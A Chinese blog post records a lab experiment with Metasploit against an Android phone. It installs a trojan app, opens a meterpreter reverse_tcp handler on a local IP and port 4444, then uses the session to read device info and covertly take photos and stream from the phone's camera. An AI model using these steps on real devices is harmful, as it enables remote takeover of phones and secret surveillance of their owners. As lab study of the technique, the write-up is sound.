記一次msfconsole_android滲透實驗


1>查看本機IP

2>生成App木馬

3>將生成的木馬安裝至手機

4>打開msfconsole

 

 1,  use exploit/multi/handler  加載模塊、

 2, set payload android/meterpreter/reverse_tcp  選擇Payload

 3,show options  查看參數設置

5>更改設置

  1, set LHOST 192.168.0.102   設置為我們生成木馬的IP地址

  2, set LPORT 4444 設置為生成木馬的監聽端口

  3, exploit   執行漏洞 ,開始監聽

6>建立連接

當app被點擊后,會無任何反應(應該會有一條連接記錄的)

但是,我在實驗時,並無效果(后來將app卸載時,添加了一條會話)

但是,使用sysinfo查看手機信息時:連接超時

於是再次安裝App,允許所有權限,裝完后點擊打開,連接被建立

查看手機信息:sysinfo

查看有幾個攝像頭:webcam_list

 

隱秘拍照功能:webcam_snap  // -i 指定那個攝像頭

(在試驗時應用提示授權,授權后可以實現隱秘拍攝)

開啟攝像頭:webcam_stream

 

會打開一個HTML文件( 略顯卡頓)

  最后再來一張網絡上的圖:

————————————————————————end——————————————————————————


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM